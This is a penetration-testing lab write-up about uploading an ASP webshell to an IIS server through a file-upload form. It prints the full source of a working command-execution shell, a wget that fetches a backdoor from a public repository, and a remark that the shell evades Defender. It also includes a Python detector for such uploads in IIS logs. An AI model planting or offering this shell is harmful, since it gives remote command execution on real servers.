IIS - webshell

  • There is a simple ASP.NET application at http://192.168.56.22/; it only gives us a simple file upload functionality.

  • From there we can upload a basic aspcmd in ASP: aspcmd.asp (at the time of writing, this avoids the Defender signature)

aspcmd.asp

wget https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/asp/aspcmd.asp

cmd.asp

<%
Function getResult(theParam)
    Dim objSh, objResult
    Set objSh = CreateObject("WScript.Shell")
    Set objResult = objSh.exec(theParam)
    getResult = objResult.StdOut.ReadAll
end Function
%>
<HTML>
    <BODY>
        Enter command:
            <FORM action="" method="POST">
                <input type="text" name="param" size=45 value="<%= myValue %>">
                <input type="submit" value="Run">
            </FORM>
            <p>
        Result :
        <% 
        myValue = request("param")
        thisDir = getResult("cmd /c" & myValue)
        Response.Write(thisDir)
        %>
        </p>
        <br>
    </BODY>
</HTML>

  • The webshell is uploaded in the upload folder.

  • And we have command execution on the IIS server
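
From the defender's side, use of a webshell like this shows up in the IIS logs as requests for a script file under the upload folder. The following is an added example (not part of the original write-up) that parses W3C-format log lines and flags such requests; the /upload/ path, the extension list, the field layout and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
from urllib.parse import unquote

# Assumption: uploads are served from /upload/ (hypothetical path; adjust to the site).
UPLOAD_PREFIX = "/upload/"
# Extensions commonly mapped to script handlers on IIS (extend to match the site's handler mappings).
SCRIPT_EXTS = {".asp", ".aspx", ".ashx", ".asmx"}

def parse_w3c(lines):
    """Yield one dict per request, taking column names from the #Fields: directive."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))

def find_upload_script_hits(lines, prefix=UPLOAD_PREFIX):
    """Return (client ip, method, uri, status) for script requests under prefix."""
    hits = []
    for rec in parse_w3c(lines):
        # Normalise URL encoding, ../ segments and case before matching.
        stem = posixpath.normpath(unquote(rec.get("cs-uri-stem", ""))).lower()
        ext = posixpath.splitext(stem)[1]
        if stem.startswith(prefix.lower()) and ext in SCRIPT_EXTS:
            hits.append((rec.get("c-ip"), rec.get("cs-method"), stem, rec.get("sc-status")))
    return hits

# Constructed sample log (not taken from a real server).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-01-01 10:00:01 192.168.56.22 GET /default.aspx - 80 - 192.168.56.1 Mozilla/5.0 200
2024-01-01 10:00:09 192.168.56.22 POST /default.aspx - 80 - 192.168.56.1 Mozilla/5.0 200
2024-01-01 10:00:15 192.168.56.22 GET /upload/report.pdf - 80 - 192.168.56.1 Mozilla/5.0 200
2024-01-01 10:00:20 192.168.56.22 POST /Upload/cmd.asp - 80 - 192.168.56.1 Mozilla/5.0 200
""".splitlines()

if __name__ == "__main__":
    for hit in find_upload_script_hits(SAMPLE_LOG):
        print(hit)
```

A hit here means a script was both stored and executed from the upload folder; a directory that only holds user uploads should never serve requests with these extensions.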
